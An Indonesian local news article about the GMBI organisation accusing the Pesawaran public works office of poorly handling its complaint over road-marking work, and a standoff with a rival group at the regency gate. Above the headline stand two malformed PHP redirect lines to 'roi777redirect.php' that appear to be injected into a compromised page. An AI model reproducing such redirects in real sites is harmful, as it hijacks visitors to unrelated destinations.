header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); GMBI Dituding tak Komperatif Tangani Aduan GMBI -
GMBI Dituding tak Komperatif Tangani Aduan GMBI

TRANSLAMPUNG.COM, PESAWARAN-Gerakan Masyarakat Bawah Indonesia (GMBI) distrik Kabupaten Pesawaran tuding Dinas Pekerjaan Umum (PU) dan Bidang Penataan Ruang Pesawaran kurang komperatif dalam menangani masalah aspirasi yang di sampaikan oleh GMBI.

Menurut Ketua GMBI distrik Kabupaten Pesawaran Halim Muktamar Hamas, pihaknya ingin menyampaikan aspirasi tentang pekerjaan marka jalan di Dusun Cikopi Desa Banjar Negri Kecamatan Way Lima Pesawaran yang dikerjakan oleh CV Rana Petama Jaya dan CV Naira Karya di duga tidak sesuai dengan RAP.

“Kami menduga banyak koropsinya di Dinas ini dan kami berharap kepada dinas PU dan penataan ruang jangan memakai oknum yang mau menghadang aspirasi kami, tapi alahamdulilah kita sudah bertemu dengan pak Firman Rusli dan menhampaikan aspirasi kami,” ucapnya.

Menaggapi masalah ini selaku pj Pu PR Pesawaran Firman Rusli mengatakan bahwa memang pihak GMBI telah bertemu dengan dirinya dan pihaknya akan mengakomodir apa yang menjadi harapan dari LSM GMBI.

“Kalau kita dari PU ini selagi sifatnya selagi informasi yang disampakaikan positif tentunya kita akan akomodir dan berharap apa pun permasalahan yang ada bisa di selsesaikan jangan sampai,” ucapnya.

Firman mengatakan, dengan adanya aspirasi yang disampaikan oleh LSM GMBI pihaknya akan mengkroscek kebenaranya dan nanti akan langsung terjun ke lapangan.

“Yang jelas kalaupun pekerjaan itu di tahun 2016 ini tentunya ada dana perbaikan tapi selali lagi kita akan kroscek dulu kelapang dan kita juga mengucapkan trimakasih atas penyampayan aspirasi dari kawan kawan GMBI,” ucap Firman.

Sebelumnya itu Masa dari Gerakan Masyarakat Bawah Indonesia (GMBI)dan Forum Aliansi Andan Jejama Bersatu (FAAJB) Hampir Ceos di depan Gapura Pemkab Pesawaran, Senin (20/2) pagi.

Rombongan masa yang memakai seragam warna hitam yang mengatas namakan dari GMBI menggunakan beberapa motor dan mengendari beberapa mobil hendak masuk kedalam kantor Pemkab untuk menyampaikan aspirasi namun di depan Gerbang pintu masuk dihadang oleh beberpa masyarakat yang mengaku dari FAAJB yang tidak menginginkan GMBI menyampaikan aspirasi mereka terkait Pekerjaan Dinas PU Setempat.

Masa GMBI dan FAAJB saling bersitega di depan Gerbang Pemkab Pesawaran untung dengan kesigapan pihak kepolisaian dari polres pesawaran bisa menenagkan masa sehingga susasana bisa kondusif,lalu pihak polresta Pesawaran meminta perwakilan dari GMBI untuk menyapaikan aspirasinya ke kantor Pu Setempat.(ydn)

News Reporter